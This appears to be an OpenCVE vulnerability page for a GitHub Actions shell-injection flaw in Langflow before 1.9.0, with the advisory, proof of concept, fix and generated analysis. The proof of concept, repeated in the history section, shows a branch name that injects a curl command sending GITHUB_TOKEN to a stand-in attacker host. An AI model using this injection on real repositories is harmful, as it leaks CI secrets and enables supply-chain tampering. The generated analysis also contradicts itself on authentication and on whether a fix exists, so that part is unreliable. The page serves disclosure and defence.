Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

### Details

Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:

```yaml
run: |
validate_branch_name "${{ github.event.pull_request.head.ref }}"
```

Or:

```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```

Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

### PoC

1. **Fork** the Langflow repository
2. **Create a new branch** with the name:
```bash
injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```
3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)
5. The `run:` step containing:
```yaml
echo "Branch: ${{ github.head_ref }}"
```
Will execute:
```bash
echo "Branch: injection-test"
curl https://attacker.site/exfil?token=$GITHUB_TOKEN
```

6. The attacker receives the CI secret via the exfil URL.

---

### Impact

- **Type:** Shell Injection / Remote Code Execution in CI
- **Scope:** Any public Langflow fork with GitHub Actions enabled
- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

### Suggested Fix

Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:

```yaml
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
echo "Branch is: \"$BRANCH_NAME\""
```

Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.

---

### Affected Files (Langflow `1.3.4`)

- `.github/actions/install-playwright/action.yml`
- `.github/workflows/deploy-docs-draft.yml`
- `.github/workflows/docker-build.yml`
- `.github/workflows/release_nightly.yml`
- `.github/workflows/python_test.yml`
- `.github/workflows/typescript_test.yml`
Published: 2026-03-24
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution
Action: Immediate Patch
AI Analysis

Impact

An unauthenticated attacker can inject arbitrary shell commands into Langflow’s GitHub Actions pipelines by leveraging unsanitized interpolation of user-controlled GitHub context variables. The vulnerability resides in multiple workflow and action files where variables such as `${{ github.head_ref }}` or `${{ github.event.pull_request.title }}` are placed directly inside shell `run:` steps. When these variables contain malicious payloads, the shell expands them unabated, allowing execution of commands that can exfiltrate secrets (e.g., `GITHUB_TOKEN`), deploy malicious containers or modify release artefacts. The flaw aligns with "CWE-74" (Improper Handling of Special Elements) and "CWE-78" (OS Command Injection).

Affected Systems

Vendors: Langflow (langflow-ai). Products: the Langflow open-source repository and any forks that enable GitHub Actions. Version range: any release prior to 1.9.0 is affected; 1.9.0 and later contain the fix that removes unsanitized variable interpolation from the relevant workflow and action files. This includes `.github/actions/install-playwright/action.yml`, `.github/workflows/deploy-docs-draft.yml`, `.github/workflows/docker-build.yml`, `.github/workflows/release_nightly.yml`, `.github/workflows/python_test.yml`, and `.github/workflows/typescript_test.yml`.

Risk and Exploitability

CVSS score of 9.1 marks this flaw as critical; while an EPSS score is not published, the public nature of the vulnerability and the ability to trigger it via a simple branch or pull request make exploitation highly probable. The vulnerability is uncontrolled and remote, enabling attackers to compromise the CI environment of any public repository that uses the affected workflows. Because the attack vector involves no authentication, it is immediately exploitable by any web user with write or pull request rights, with outcomes ranging from secret exfiltration to supply-chain tampering or infrastructure hijacking.

Generated by OpenCVE AI on March 24, 2026 at 20:37 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update to Langflow version 1.9.0 or later to receive the official patch that removes unsanitized interpolation.
  • Replace any direct `${{ … }}` placeholders inside `run:` steps with properly escaped environment variables (e.g., set `env:` keys and quote them).
  • Audit all GitHub Actions workflows and action metadata to ensure no user-controlled variables are interpolated directly into shell commands.
  • Disable or restrict the execution of GitHub Actions on public forks if the project cannot be fully audited (e.g., enable workflow approvals or branch protection).
  • Monitor CI logs for unexpected command execution and verify that secrets are not being leaked.
  • If an immediate update is not possible, temporarily set secrets to false for public forks until the codebase can be reviewed or patched.

Generated by OpenCVE AI on March 24, 2026 at 20:37 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 24 Mar 2026 19:15:00 +0000

Type Values Removed Values Added
First Time appeared Langflow
Langflow langflow
CPEs cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
Vendors & Products Langflow
Langflow langflow

Tue, 24 Mar 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 24 Mar 2026 13:00:00 +0000

Type Values Removed Values Added
Description Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
Title Langflow GitHub Actions Shell Injection
Weaknesses CWE-74
CWE-78
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}

Subscriptions

Langflow Langflow
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-25T03:55:45.997Z

Reserved: 2026-03-20T16:16:48.969Z

Link: CVE-2026-33475

cve-icon Vulnrichment

Updated: 2026-03-24T14:04:12.775Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-24T13:16:04.030

Modified: 2026-03-24T19:13:01.250

Link: CVE-2026-33475

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-25T20:50:18Z

Weaknesses